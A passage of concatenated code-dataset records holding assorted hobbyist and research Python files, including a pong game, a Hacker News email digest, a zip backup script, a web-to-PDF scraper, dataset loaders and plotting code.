= socket(AF_INET, SOCK_STREAM)\n\tsockobj.connect((ip, porta))\n\t\n\ncria_cliente('127.0.0.1', 50007)\n\nwhile True:\n\n\t#requisita = ''.encode()\t\n\t#sockobj.send(requisita)\n\t\n\t#Depois de mandar uma mensagem esperamos uma resposta do servidor \n\tdata = sockobj.recv(1024)\n\tjson_da_lista = data.decode(\"utf-8\")\n\tlista_de_linhas = json.loads(json_da_lista)\n\tlinhas = '\\n'.join(lista_de_linhas)\n\tarquivo = open('file2.txt', 'w')\n\tarquivo.writelines(linhas)\n\tarquivo.close()","sub_path":"ladisan/Cliente/base_cliente_teste.py","file_name":"base_cliente_teste.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"316385656","text":"# a reasonable SNR level should be between 0 to 15dB\nimport random\nimport numpy as np\n\n\npname_list = [\n \"noises_p\",\n \"reverb_p\",\n \"music_p\",\n \"overlap_p\",\n \"noises_snrs\",\n \"music_snrs\",\n \"overlap_snrs\",\n # 'bandrop_p'\n]\n\n\ndef convert2old(aug_config):\n return {\n 'reverb_p': aug_config['reverb']['p'],\n 'music_p': aug_config['music']['p'],\n 'noises_p': aug_config['noises']['p'],\n 'overlap_p': aug_config['overlap']['p'],\n 'music_snrs': aug_config['music']['snr'],\n 'overlap_snrs': aug_config['overlap']['snr'],\n 'noises_snrs': aug_config['noises']['snr'],\n \"spec_aug_time_mask_size\": aug_config[\"spec_aug\"]['time_mask_size'],\n \"spec_aug_freq_mask_size\": aug_config[\"spec_aug\"]['freq_mask_size'],\n }\n\ndef convert2new(aug_config):\n return {\n 'reverb': {'p': aug_config['reverb_p'], 'snr': 0,},\n 'music': {'p': aug_config['music_p'], 'snr': aug_config['music_snrs']},\n 'overlap': {'p': aug_config['overlap_p'], 'snr': aug_config['overlap_snrs']},\n 'noises': {'p': aug_config['noises_p'], 'snr': aug_config['noises_snrs']},\n \"spec_aug\": {\"time_mask_size\": aug_config[\"spec_aug_time_mask_size\"],\n \"freq_mask_size\": aug_config[\"spec_aug_freq_mask_size\"]},\n }\n\n\ndef explore(aug_config_new):\n for key, item in aug_config_new.items():\n #ax_freq_mask_len=27, max_time_mask_len=100\n if key == \"spec_aug\":\n pass\n # if random.random() < 0.5:\n # # only doing resample for spec_aug\n # # item['time_mask_size'] = int(np.random.choice([50, 80, 120, 150], p=[0.25, 0.25, 0.25, 0.25]))\n # # item['freq_mask_size'] = int(np.random.choice([10, 15, 20, 25], p=[0.25, 0.25, 0.25, 0.25]))\n # item['time_mask_size'] = int(np.random.choice([30, 50, 70, 80], p=[0.25, 0.25, 0.25, 0.25]))\n # item['freq_mask_size'] = int(np.random.choice([10, 15, 20, 25], p=[0.25, 0.25, 0.25, 0.25]))\n else:\n inc_p = float(np.random.choice([0.0, 0.1, 0.15, 0.2, 0.25], p=[0.2, 0.2, 0.2, 0.2, 0.2]))\n inc_snr = int(np.random.choice([2, 3, 4, 5, 6], p=[0.2, 0.2, 0.2, 0.2, 0.2]))\n # amt = int(amt)\n if random.random() < 0.5:\n item['p'] = float(round(max(0, item['p'] - inc_p), 3))\n # breakpoint()\n item['snr'] = int(max(0, item['snr'] - inc_snr))\n else:\n item['p'] = float(round(max(0, item['p'] + inc_p), 3))\n # breakpoint()\n item['snr'] = int(max(0, item['snr'] + inc_snr))\n\n if item['p'] < 0:\n item['p'] = 0\n elif item['p'] > 1:\n item['p'] = 1\n\n if item['snr'] < 0:\n item['snr'] = 0\n\n\nif __name__ == '__main__':\n aug_config_old = {\n 'reverb_p': 0.2,\n 'music_p': 0.2,\n 'noises_p': 0.2,\n 'overlap_p': 0.2,\n 'music_snrs': 5,\n 'overlap_snrs': 10,\n 'noises_snrs': 15,\n }\n new_config = convert2new(aug_config_old)\n print(new_config)\n old_config = convert2old(new_config)\n print(old_config)\n new_config = convert2new(old_config)\n explore(new_config)\n print(new_config)\n","sub_path":"pba/new_explore.py","file_name":"new_explore.py","file_ext":"py","file_size_in_byte":3289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"368018268","text":"#!/usr/bin/env python\n# -*- coding: utf-8 0*0\n\nimport requests\n# Import smtplib for the actual sending function\nimport smtplib\n\n# Import the email modules we'll need\nfrom email.mime.text import MIMEText\n\nbase_url = 'https://hacker-news.firebaseio.com'\nstories_file = 'stories.txt'\nmails_file = 'sendingto.txt'\nsending_mail = ''\nwith open(stories_file) as f:\n meanwhile_stories = f.read().splitlines()\nwith open(mails_file) as f:\n mails = f.read().splitlines()\n\ncurrent_mail = ''\n\nfor s in meanwhile_stories:\n try:\n story = requests.get(base_url + '/v0/item/'+str(s)+'.json').json()\n print('add story :{0}'.format(str(s)))\n msg = \"\"\n if 'url' in story:\n msg = str(s) + ' - ' + story['title'] + ' - ' + story['url'] + ' comments : https://news.ycombinator.com/item?id='+ str(s) +' \\n'\n print(msg)\n else:\n msg = str(s) + ' - ' + story['title'] + ' comments : https://news.ycombinator.com/item?id='+ str(s) + '\\n'\n print(msg)\n current_mail+=msg\n except:\n print(\"Error for \"+str(s))\nprint('=================')\nif current_mail is not \"\":\n for mail in mails:\n try:\n if mail is not \"\":\n print(mail)\n email = MIMEText(current_mail)\n email['Subject'] = \"HN News Recap\"\n email['From'] = sending_mail \n email['To'] = mail\n s = smtplib.SMTP(\"localhost\");\n s.sendmail(sending_mail, mail ,email.as_string())\n s.quit()\n print(\"Mail sent\")\n except Exception as e:\n print(\"Error for :\"+mail+\" \"+str(e));\n\n \nwith open(stories_file, 'w') as f:\n\tf.write('')\n\n","sub_path":"mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"255042422","text":"#!/usr/bin/env python3\n#file-name: bak_3.py\n\nimport os\nimport time\n\nsource = ['/home/bocyn/Документы']\ntarget_dir = '/home/bocyn/Dropbox/Backup'\ntoday = target_dir+os.sep+time.strftime('%Y%m%d')\nnow = time.strftime('%H%M%S')\n\nif not os.path.exists(today):\n\tos.mkdir(today)\n\ncomment = input('Введи комент-->')\n\nif len(comment) == 0:\n\ttarget = today+os.sep+now+'.zip'\nelse:\n\ttarget = today+os.sep+now+'_'+comment.replace(' ', '_')\n\nzip_command = \"zip -qr {0} {1}\".format(target, ' '.join(source))\n\nif os.system(zip_command) == 0:\n\tprint('Бекап создан в', today)\nelse:\n\tprint('ERROR')\n","sub_path":"bak_3.py","file_name":"bak_3.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"159846709","text":"import pygame\r\n\r\n\r\npygame.init()\r\n\r\nDISPLAY_WIDTH = 800\r\nDISPLAY_HEIGHT = 600\r\n\r\n# Color definitions\r\nBLACK = (0,0,0)\r\nWHITE = (255,255,255)\r\n\r\nDISPLAY = pygame.display.set_mode((DISPLAY_WIDTH,DISPLAY_HEIGHT))\r\npygame.display.set_caption(\"A really stupid pong game\")\r\nclock = pygame.time.Clock()\r\npygame.font.init()\r\nFONT = pygame.font.SysFont('Arial', 30)\r\n\r\nclass Ball(pygame.sprite.Sprite):\r\n def __init__(self, x, y):\r\n super().__init__()\r\n\r\n self.image = pygame.Surface((15,15))\r\n self.image.fill(BLACK)\r\n self.rect = self.image.get_rect()\r\n self.rect.centerx = DISPLAY_WIDTH / 2\r\n self.rect.centery = DISPLAY_HEIGHT / 2\r\n self.x_vel = 5\r\n self.y_vel = 5\r\n self.touching_paddle = False\r\n\r\n def update(self):\r\n self.rect.x += self.x_vel\r\n\r\n if self.rect.x < 0 or self.rect.x > DISPLAY_WIDTH - self.rect.width:\r\n self.rect.x = min(max(0, self.rect.x), DISPLAY_WIDTH - self.rect.width)\r\n self.x_vel = -self.x_vel\r\n\r\n self.rect.y += self.y_vel\r\n\r\n if self.rect.y < 0:\r\n self.rect.y = min(max(0, self.rect.y), DISPLAY_HEIGHT - self.rect.width)\r\n self.y_vel = -self.y_vel\r\n \r\n if self.rect.y > DISPLAY_HEIGHT - self.rect.width:\r\n global Game_Over\r\n Game_Over = True\r\n \r\n if pygame.sprite.collide_rect(self, paddle):\r\n if not self.touching_paddle:\r\n self.y_vel = -self.y_vel\r\n self.touching_paddle = True\r\n global Score\r\n Score += 1\r\n else: self.touching_paddle = False\r\n \r\n\r\nclass Paddle(pygame.sprite.Sprite):\r\n def __init__(self):\r\n\r\n super().__init__()\r\n\r\n self.image = pygame.Surface((100,15))\r\n self.image.fill(BLACK)\r\n self.rect = self.image.get_rect()\r\n self.rect.centerx = DISPLAY_WIDTH / 2\r\n self.rect.y = DISPLAY_HEIGHT - 50\r\n\r\n self.x_vel = 0\r\n \r\n def change_speed(self, speed):\r\n self.x_vel += speed\r\n \r\n def update(self):\r\n self.x_vel *= 0.8\r\n if abs(self.x_vel) < 0.5: self.x_vel = 0\r\n self.rect.x += self.x_vel\r\n\r\n if self.rect.x < 0 or self.rect.x > DISPLAY_WIDTH - self.rect.width:\r\n self.rect.x = min(max(0, self.rect.x), DISPLAY_WIDTH - self.rect.width)\r\n\r\ndef draw_text(text, x, y):\r\n DISPLAY.blit(FONT.render(text, False, (0, 0, 0)), (x,y))\r\n\r\ndef draw():\r\n DISPLAY.fill(WHITE)\r\n sprites.draw(DISPLAY)\r\n if Score > 0: draw_text(str(Score), 10, 10)\r\n\r\nsprites = pygame.sprite.Group()\r\nball = Ball(0,0)\r\npaddle = Paddle()\r\nsprites.add(paddle)\r\nsprites.add(ball)\r\n\r\ndef game_loop():\r\n global Game_Over, Score\r\n Game_Over = False\r\n Score = 0\r\n right = left = False\r\n while not Game_Over:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT:\r\n right = True\r\n elif event.key == pygame.K_RIGHT:\r\n left = True\r\n\r\n if event.type == pygame.KEYUP:\r\n if event.key == pygame.K_LEFT:\r\n right = False\r\n elif event.key == pygame.K_RIGHT:\r\n left = False\r\n \r\n if left:\r\n paddle.change_speed(5)\r\n if right:\r\n paddle.change_speed(-5)\r\n \r\n sprites.update()\r\n \r\n draw()\r\n pygame.display.update()\r\n clock.tick(60)\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n \r\n clock.tick(60)\r\n\r\ngame_loop()\r\npygame.quit()\r\nquit()","sub_path":"archive/Pygame/pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":3872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"619662687","text":"#\n# @lc app=leetcode.cn id=859 lang=python3\n#\n# [859] 亲密字符串\n#\n\n# @lc code=start\nclass Solution:\n def buddyStrings(self, A: str, B: str) -> bool:\n if len(A)!=len(B):\n return False\n if A==B:\n return len(A) != len(set(A))\n first = second = None\n for index in range(len(A)):\n if A[index] != B[index]:\n if first is not None and second is not None:\n return False\n elif first is not None:\n if A[first] == B[index] and B[first] == A[index]:\n second = index\n continue\n else:\n first = index\n return bool(second)\n def buddyStrings(self, A: str, B: str) -> bool:\n if len(A)!=len(B):\n return False\n if A==B:\n return len(A) != len(set(A))\n diffs = []\n for index in range(len(A)):\n if A[index] != B[index]:\n diffs.append(index)\n if len(diffs) != 2:\n return False\n i, j = diffs\n return A[i] == B[j] and B[i]==A[j]\n\n\n\n\n\n# @lc code=end\n\n","sub_path":"859.亲密字符串.py","file_name":"859.亲密字符串.py","file_ext":"py","file_size_in_byte":1160,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"68162719","text":"\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 18 13:27:15 2021\n\n@author: yp229\n\"\"\"\n\nimport pdfkit\nimport os\nfrom bs4 import BeautifulSoup as bs\nfrom urllib.request import urlopen,Request\n\nos.getcwd()\n#path = 'Desktop/print_to_pdf/'\n#os.makedirs(path)\n\npath_htmltopdf = r'C:\\Program Files\\wkhtmltopdf\\bin\\wkhtmltopdf.exe'\n\nconfig = pdfkit.configuration(wkhtmltopdf = path_htmltopdf)\n\n\n#company = \"12549701\"\n\ncompany = input(\"Enter Company Number: \")\n\nurl = \"https://find-and-update.company-information.service.gov.uk/company/\" + str(company) + \"/\"\nuser_agent = 'Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46'\nclient = urlopen(Request(str(url), data=None, headers={'User-Agent': user_agent}))\nhtml=client.read()\nclient.close()\nsoup=bs(html,\"html.parser\")\n\nCompany_Name=soup.find(\"div\",{\"class\":\"company-header\"}).find(\"p\").text\nprint(\"\\n\" + Company_Name + \"\\n\")\ncontainer=soup.findAll(\"div\",{\"class\":\"section-tabs js-tabs\"})\n\np = 'Desktop/' + str(Company_Name) + '/'\ntry:\n os.makedirs(p)\nexcept FileExistsError:\n print(\"Folder exists already\\n\")\n\n\nall_linker = container[0].findAll('li')\n\n\nfor i in all_linker:\n \n pdf_name = i.find('a').text.split('for')[0].strip()\n link = i.find('a')['href']\n \n try:\n l = \"https://find-and-update.company-information.service.gov.uk\" + str(link) \n \n #Printing twwo pages of people if it has\n if pdf_name==\"People\":\n \n client = urlopen(Request(str(l), data=None, headers={'User-Agent': user_agent}))\n html=client.read()\n client.close()\n soup_2=bs(html,\"html.parser\")\n container_2=soup_2.findAll(\"ul\",{\"class\":\"search-tabs\"})[0].findAll('li')\n \n if len(container_2)>1:\n pdf_name = pdf_name + \" Officers\"\n path = \".\\\\Desktop\\\\\" + str(Company_Name) + \"\\\\\" + str(pdf_name) +\".pdf\"\n pdfkit.from_url(l,path,configuration = config)\n link_2 = container_2[1].find('a')['href']\n l_2 = \"https://find-and-update.company-information.service.gov.uk/\" + str(link_2) \n pdf_name = pdf_name + \" PWSC\"\n path = \".\\\\Desktop\\\\\" + str(Company_Name) + \"\\\\\" + str(pdf_name) +\".pdf\"\n pdfkit.from_url(l_2,path,configuration = config)\n\n\n \n else:\n path = \".\\\\Desktop\\\\\" + str(Company_Name) + \"\\\\\" + str(pdf_name) +\".pdf\"\n pdfkit.from_url(l,path,configuration = config)\n \n \n except:\n next","sub_path":"PDF DOWNLOAD/Test_1.py","file_name":"Test_1.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"280315694","text":"import time\nfrom os.path import join as pjoin\nfrom pathlib import Path\nfrom utils.util import memcache\nfrom base.base_dataset import BaseDataset\n\n\nclass ActivityNet(BaseDataset):\n\n def configure_train_test_splits(self, split_name):\n train_list_path = \"train_list.txt\"\n if split_name == \"val1\":\n test_list_path = \"val_1_list.txt\"\n raw_caps_name = \"raw-captions-train-val_1.pkl\"\n elif split_name == \"val2\":\n test_list_path = \"val_2_list.txt\"\n raw_caps_name = \"raw-captions-train-val_2.pkl\"\n else:\n raise ValueError(f\"Unrecognised activity-net split: {split_name}\")\n\n train_list_path = pjoin(self.root_feat, train_list_path)\n test_list_path = pjoin(self.root_feat, test_list_path)\n self.raw_captions_path = Path(self.root_feat) / raw_caps_name\n\n print(\"loading training/val splits....\")\n tic = time.time()\n with open(train_list_path) as f:\n self.train_list = f.readlines()\n self.train_list = [x.strip() for x in self.train_list]\n with open(test_list_path) as f:\n self.test_list = f.readlines()\n self.test_list = [x.strip() for x in self.test_list]\n print(\"done in {:.3f}s\".format(time.time() - tic))\n self.split_name = split_name\n\n def load_features(self):\n root_feat = self.root_feat\n feat_names = {\n \"face\": \"VGGFace2-ResNet50-face-avg.pickle\",\n \"flow\": \"i3d-i3d-avg.pickle\",\n \"rgb\": f\"{self.rgb_model_name}-imagenet-avg-nocrop.pickle\",\n \"scene\": \"densenet161-scene-max.pickle\",\n \"ocr\": \"AN_OCR_ALL_unique_video_w2v.pkl\",\n \"audio\": \"vggish-audio-raw.pickle\",\n \"speech\": \"stt_w2v.pickle\",\n }\n feat_paths = {key: Path(root_feat) / value for key, value in feat_names.items()}\n\n if self.text_feat == \"openai\":\n text_feat_train_path = pjoin(root_feat, \"openai-train.pkl\")\n text_feat_val1_path = pjoin(root_feat, \"openai-val1.pkl\")\n text_feat_val2_path = pjoin(root_feat, \"openai-val2.pkl\")\n else:\n raise ValueError(f\"Text features {self.text_feat} not supported \")\n\n features = {expert: memcache(path) for expert, path in feat_paths.items()}\n text_features = memcache(text_feat_train_path)\n if self.split_name == \"val1\":\n text_features.update(memcache(text_feat_val1_path))\n elif self.split_name == \"val2\":\n text_features.update(memcache(text_feat_val2_path))\n else:\n raise ValueError(f\"unrecognised activity-net split: {self.split_name}\")\n\n self.features = features\n self.text_features = text_features\n self.raw_captions = memcache(self.raw_captions_path)\n\n def sanity_checks(self):\n msg = (f\"Expected to have single test caption for ANet, since we assume\"\n f\"that the captions are fused (but using {self.num_test_captions})\")\n assert self.num_test_captions == 1, msg\n","sub_path":"data_loader/ActivityNet_dataset.py","file_name":"ActivityNet_dataset.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"246623671","text":"import world, items, display, os\nfrom player import Player\n\ndef play():\n world.load_tiles()\n player = Player()\n # Display introduction to game\n intro()\n # These lines load the starting room and display the text\n room = world.tile_exists(player.location_x, player.location_y)\n display.slow_print(room.intro_text())\n while player.is_alive() and not player.victory:\n # Check if player has all generator pieces\n generatorPiecesObtained = 0\n for item in player.inventory:\n if item.name == items.GeneratorPart1(0).name:\n generatorPiecesObtained += 1\n elif item.name == items.GeneratorPart2(0).name:\n generatorPiecesObtained += 1\n elif item.name == items.GeneratorPart3(0).name:\n generatorPiecesObtained += 1\n player.generatorPiecesObtained = generatorPiecesObtained\n\n room = world.tile_exists(player.location_x, player.location_y)\n room.modify_player(player)\n\n # Check again since the room could have changed the player's state\n if player.is_alive() and not player.victory:\n display.slow_print(\"Jack's HP: {}\".format(player.hp))\n display.slow_print(\"Generator Parts Obtained: {}\".format(player.generatorPiecesObtained))\n display.slow_print(\"\\nHilda, what should I do?\\n\")\n available_actions = room.available_actions()\n for action in available_actions:\n print(action)\n action_input = input('\\nAction: ')\n for action in available_actions:\n if action_input.upper() == action.hotkey:\n player.do_action(action, **action.kwargs)\n break\n elif player.hp == 0:\n display.slow_print(\"\"\"\n Jack feels numb and can no longer move his body. His vision blurs as he falls.\n \"\"\")\n\n display.slow_print(\"\"\"\n Game Over\n \"\"\")\n return\n\ndef intro():\n display.slow_print(\"\"\"\n ---------------------\n | End of the Tunnel |\n | A Text Adventure Game |\n ---------------------\n\n\n In an alternate 1830’s industrial revolution, our world was \n hit a brutal ice age. In order for people to survive, they had to \n relocate to the underground tunnels and catacombs. Although, \n people banded together for their survival, a caste system forms \n between those that could afford to bring machinery and resources \n and those who could not. The upper class citizen had access to \n basic necessities and lived lavishly while the lower class were \n farmers that lived in disease filled conditions.\n\n Our story begins with a man named Jack Hill, a lower class citizen \n and mechanic of the power generator providing heat for his \n underground colony. Jack recently lost his wife, Hilda, a servant \n for an upper class noble a month ago due to poor working conditions. \n Devastated and without any friends, Jack begins talking to himself \n as if Hilda, never left him. One day, Jack wakes up to his town in disarray. \n As Jack makes his way to the Town Hall, he learns that someone has sabotaged \n the generator and three pieces are missing. Now Jack has to recover the \n pieces before he and the town die without a heat source. \n \"\"\")\n\nif __name__ == \"__main__\":\n play()","sub_path":"IST446_Intro_to_Building_Computer_Games/EndOfTheTunnelTextAdventure/TextAdventure/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"419704974","text":"import numpy as np\nimport random\n\nclass SM_alg():\n \"\"\" \n Calculate pi using direct sampling monte carlo algorithms\n \"\"\"\n def __init__(self,N):\n self.N = N\n self.Nhits = 0\n def direct_sampling(self):\n\n x = np.random.uniform(-1, 1, self.N)\n y = np.random.uniform(-1, 1, self.N)\n\n for i,j in np.nditer([x,y]):\n if (i*i) + (j*j) < 1:\n self.Nhits = self.Nhits + 1\n \n def markov_pi(self,x_markov,y_markov,delta):\n \"\"\"Pi comes out as four times the ratio of hits\n to trials \n \"\"\"\n self.x_markov = x_markov\n self.y_markov = y_markov\n self.delta = delta\n\n deltax = np.random.uniform(-self.delta, self.delta, self.N)\n deltay = np.random.uniform(-self.delta, self.delta, self.N)\n\n for i,j in np.nditer([deltax,deltay]): \n if np.absolute(self.x_markov + i) < 1 and np.absolute(self.y_markov + j) < 1:\n\n self.x_markov = self.x_markov + i\n self.y_markov = self.y_markov + j \n\n if (self.x_markov * self.x_markov) + (self.y_markov * self.y_markov) < 1:\n self.Nhits = self.Nhits + 1 \n","sub_path":"direct_pi.py","file_name":"direct_pi.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"5445683","text":"import albedo._albedo.setaxes as setaxes\n#import _albedo.setaxes as setaxes\nimport param\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg\nfrom matplotlib.figure import Figure\n\nimport numpy as np\nfrom datetime import datetime, timedelta\n\nimport pandas as pd\n\nclass PlotMethods(setaxes.SetAxes):\n \n @param.depends('run_state', 'date', 'elev', 'choose3d')\n def axes3d(self, figsize=(6,6), topMargin=1.2, bottomMargin=0):\n if self.run_state == True:\n pass\n else:\n plt.close()\n fig = plt.figure(figsize=figsize)\n ax = fig.add_subplot(111, projection='3d')\n\n if self.choose3d:\n if 'Raw Lidar' in self.choose3d:\n xyz = self.datetime2xyz(choice='raw')\n Easting, Northing, Elevation = xyz[:,0], xyz[:,1], xyz[:,2]\n ax.scatter(Easting, Northing, Elevation,\n cmap='viridis', c=Elevation)\n \n if 'Pointcloud' in self.choose3d:\n xyz = self.datetime2xyz(choice='pointcloud')\n Easting, Northing, Elevation = xyz[:,0], xyz[:,1], xyz[:,2]\n ax.scatter(Easting, Northing, Elevation,\n cmap='viridis', c=Elevation)\n\n if 'Planar Fit' in self.choose3d:\n XYZ = self.pFit()\n X, Y, Z = XYZ[:,:,0], XYZ[:,:,1], XYZ[:,:,2]\n ax.plot_surface(X, Y, Z, color='r', \n rstride=1, cstride=1, alpha=0.4)\n\n ax.view_init(elev=self.elev, azim=self.azim)\n ax.set_xlim(320977, 320980)\n ax.set_xlabel('Easting')\n ax.set_ylim(4168144, 4168147)\n ax.set_ylabel('Northing')\n ax.set_zlim(2941.977, 2948.356)\n ax.set_zlabel('Elevation')\n plt.subplots_adjust(top=topMargin, bottom=bottomMargin) \n plt.close()\n return fig\n \n @param.depends('date', 'resolution', 'sigma', 'time', 'activateMask')\n def triptych(self, figsize=(12,5), wspace=0.05, hspace=0, leftMargin=0.05, \n rightMargin=0.97, topMargin=0.79, bottomMargin=0.1):\n plt.close()\n fig, ax = plt.subplots(1,3, figsize=figsize, dpi=self.dpi)\n canvas = FigureCanvasAgg(fig)\n\n ds = self.date_string\n line2 = f'\\nR, S ={(self.resolution,self.sigma)}'\n\n titles = [f'{ds}: Elevation'+line2, f'{ds}: Slope'+line2,\n f'{ds}: Aspect (South=0, East +)'+line2]\n\n if self.activateMask == 'Overlay':\n imgs = [self.masked_elev, self.masked_slope, self.masked_aspect]\n elif self.activateMask == 'Remove':\n imgs = [self.elevRast, self.slopeRast, self.aspectRast]\n\n cmaps = ['viridis', 'YlOrBr', 'hsv']\n cmapRanges = [(np.min(self.elevRast), np.max(self.elevRast)),\n (np.min(self.slopeRast), np.max(self.slopeRast)),\n (-180, 180)]\n\n ticks = np.linspace(0, self.resolution-1, 4)\n xlabels = [str(self.eastMin)[-2:], str(self.eastMin+1)[-2:],\n str(self.eastMin+2)[-2:], str(self.eastMax)[-2:]]\n ylabels = [str(self.northMin)[-2:], str(self.northMin+1)[-2:],\n str(self.northMin+2)[-2:], str(self.northMax)[-2:]]\n\n ims = []\n for i in range(3):\n img, cmap = imgs[i], cmaps[i]\n im = ax[i].imshow(img, origin='lower', cmap=cmap,\n vmin=cmapRanges[i][0], vmax=cmapRanges[i][1])\n ims.append(im)\n ax[i].set_xticks(ticks=ticks)\n ax[i].set_xticklabels(labels=xlabels)\n ax[i].set_yticks(ticks=ticks)\n if i == 0:\n ax[i].set_yticklabels(labels=ylabels)\n ax[i].set_ylabel(f'Northing (+{str(self.northMin)[:-2]}e2)')\n else:\n ax[i].set_yticklabels(labels=[])\n if i == 1:\n ax[i].set_xlabel(f'Easting (+{str(self.eastMin)[:-2]}e2)')\n ax[i].set_aspect(\"equal\")\n\n plt.subplots_adjust(left=leftMargin, right=rightMargin,\n top=topMargin, bottom=bottomMargin,\n wspace=wspace, hspace=hspace)\n\n for i in range(3):\n p = ax[i].get_position().get_points().flatten()\n ax_cbar = fig.add_axes([p[0], 0.85, p[2]-p[0], 0.05])\n ax_cbar.set_title(titles[i], loc='left')\n cb = plt.colorbar(ims[i], cax=ax_cbar, orientation='horizontal')\n if i == 2:\n cbar_ticks = [-180, -135, -90, -45, 0, 45, 90, 135, 180]\n cb.set_ticks(cbar_ticks)\n\n if self.run_state == True:\n canvas.draw() # Retrieve a view on the renderer buffer\n buf = canvas.buffer_rgba()\n X = np.asarray(buf) # convert to a NumPy array\n plt.close()\n return X\n else:\n plt.close()\n return fig\n \n @param.depends('date', 'time', 'bins')\n def polarAxes(self, figsize=(3.5,5), topMargin=1, bottomMargin=0,\n leftMargin=0.1, rightMargin=0.92):\n \n df = self.dataframe\n\n plt.close()\n fig = plt.figure(figsize=figsize, dpi=self.dpi)\n canvas = FigureCanvasAgg(fig)\n \n ax = fig.add_subplot(111, projection='polar')\n ax.set_theta_zero_location('N')\n ax.set_xticks(([np.deg2rad(0), np.deg2rad(45), np.deg2rad(90),\n np.deg2rad(135), np.deg2rad(180), np.deg2rad(225),\n np.deg2rad(270), np.deg2rad(315)]))\n xlbls = np.array(['N','45','E','135','S','225','W','315'])\n ax.set_xticklabels(xlbls, rotation=\"vertical\", size=12)\n ax.tick_params(axis='x', pad = 0.5)\n ax.set_theta_direction(-1)\n ax.set_rmin(0)\n ax.set_rmax(90)\n ax.set_rlabel_position(90)\n \n if self.bins != 'Max':\n col = df['bin_assignment']\n xs = [np.deg2rad(self.angle_dict[entry]) for entry in col]\n x = np.deg2rad(self.angle_dict[col.iloc[self.time]])\n else:\n col = df['solarAzimuth']\n xs = np.deg2rad(col)\n x = np.deg2rad(col.iloc[self.time])\n\n ys = df['solarAltitude']\n y = df['solarAltitude'].iloc[self.time]\n\n ax.scatter(xs,ys, s=10, c='orange',alpha=0.5)\n ax.scatter(x, y, s=500, c='gold',alpha=1)\n \n self.dt_str = df['MeasDateTime'].iloc[self.time]\n line1=f'{self.dt_str} Sun Position'\n line2=f'Azi, SZA={np.around((np.rad2deg(x),y),1)}, Bins={self.bins}'\n\n plt.subplots_adjust(top=topMargin, bottom=bottomMargin,\n left=leftMargin, right=rightMargin)\n\n p = ax.get_position().get_points().flatten()\n ax_cbar = fig.add_axes([p[0]+0.085, 0.85, p[2]-p[0], 0.05])\n ax_cbar.set_title(line1+'\\n'+line2, loc='left')\n ax_cbar.axis('off')\n\n if self.run_state == True:\n canvas.draw() # Retrieve a view on the renderer buffer\n buf = canvas.buffer_rgba()\n X = np.asarray(buf) # convert to a NumPy array\n plt.close()\n return X\n else:\n plt.close()\n return fig\n \n @param.depends('date', 'resolution', 'sigma', 'time', 'activateMask')\n def diptych(self, figsize=(8.25,5), topMargin=0.85, bottomMargin=0.05,\n leftMargin=0.095, rightMargin=0.95, wspace=0.1, hspace=0):\n '''\n generates and plots a 'magma' themed M raster and \n the direct rad shade mask for the given date & time\n '''\n plt.close()\n fig, ax = plt.subplots(1,2, figsize=figsize, dpi=self.dpi)\n \n canvas = FigureCanvasAgg(fig)\n\n line2 = f'\\nR, S, B={(self.resolution,self.sigma,self.bins)}'\n title1 = f'{self.dt_str}: Terrain Correction'+line2\n title2 = f'{self.dt_str}: Current Visibility'+line2\n titles = [title1, title2]\n\n if self.activateMask == 'Overlay':\n imgs = [self.masked_m, self.mask]\n elif self.activateMask == 'Remove':\n imgs = [self.m, self.mask]\n\n cmaps = ['magma', 'binary']\n cmapRanges = [(0,2), (0, 1)]\n\n ticks = np.linspace(0, self.resolution-1, 4)\n xlabels = [str(self.eastMin)[-2:], str(self.eastMin+1)[-2:],\n str(self.eastMin+2)[-2:], str(self.eastMax)[-2:]]\n ylabels = [str(self.northMin)[-2:], str(self.northMin+1)[-2:],\n str(self.northMin+2)[-2:], str(self.northMax)[-2:]]\n\n ims = []\n for i in range(2):\n img, cmap = imgs[i], cmaps[i]\n im = ax[i].imshow(img, origin='lower', cmap=cmap,\n vmin=cmapRanges[i][0], vmax=cmapRanges[i][1])\n ims.append(im)\n ax[i].set_xticks(ticks=ticks)\n ax[i].set_xticklabels(labels=xlabels)\n ax[i].set_yticks(ticks=ticks)\n if i == 0:\n ax[i].set_yticklabels(labels=ylabels)\n ax[i].set_ylabel(f'Northing (+{str(self.northMin)[:-2]}e2)')\n else:\n ax[i].set_yticklabels(labels=[])\n if i == 0:\n ax[i].set_xlabel(f'Easting (+{str(self.eastMin)[:-2]}e2)')\n ax[i].set_aspect(\"equal\")\n\n plt.subplots_adjust(left=leftMargin, right=rightMargin,\n top=topMargin, bottom=bottomMargin,\n wspace=wspace, hspace=hspace)\n\n for i in range(2):\n p = ax[i].get_position().get_points().flatten()\n ax_cbar = 